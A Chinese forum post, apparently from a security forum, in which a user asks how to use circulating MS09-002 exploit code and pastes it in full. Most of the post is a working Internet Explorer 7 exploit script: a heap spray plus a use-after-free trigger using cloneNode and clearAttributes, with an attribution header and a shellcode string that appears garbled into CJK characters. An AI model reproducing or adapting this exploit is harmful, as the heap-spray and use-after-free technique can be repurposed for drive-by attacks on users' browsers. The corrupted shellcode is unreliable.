最近的MS09-002爆发...代码在网上传的都像原来的135那样了....
但是我看不懂也...问好怎么利用这代码..好像是脚本吧？

是不是要ODAY那本书里面的那个傻瓜化的MSF那个网页工具哦？
<script language="JavaScript">
<!--
MS09-002 Internet Exploere 7.0 Exploit
Modify by Friddy 2009.02.12 mail:qianyang@ssyeah.com
blog:www.friddy.cn
Tested under Windows XP sp2+IE 7.0
shellcode will popup the calc.exe
-->
var shellcode=unescape("%uE8FCD䖋謼ռŸ误ᡏ律Ġ䧫㒋Ƌ㇮駀蒬瓀섇්숁吻Ф律Ĥ曫ಋ譋ᱟ᲋Ƌ觫⑜쌄쀱譤぀삅౸䂋謌ᱰ训ࡨ৫肋°梋弼噠삃偻繨桳ﺘຊｗ揧污c");

var array = new Array();

var ls = 0x100000-(shellcode.length*2+0x01020);

var b = unescape("഍഍");
while(b.length<ls) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;

for(i=0; i<0xD0; i++) {
    array[i] = lh + shellcode;
}

CollectGarbage();

var s1=unescape("ଋଋAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<500;x++) a1.push(document.createElement("img"));
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();   
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
</script>

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入！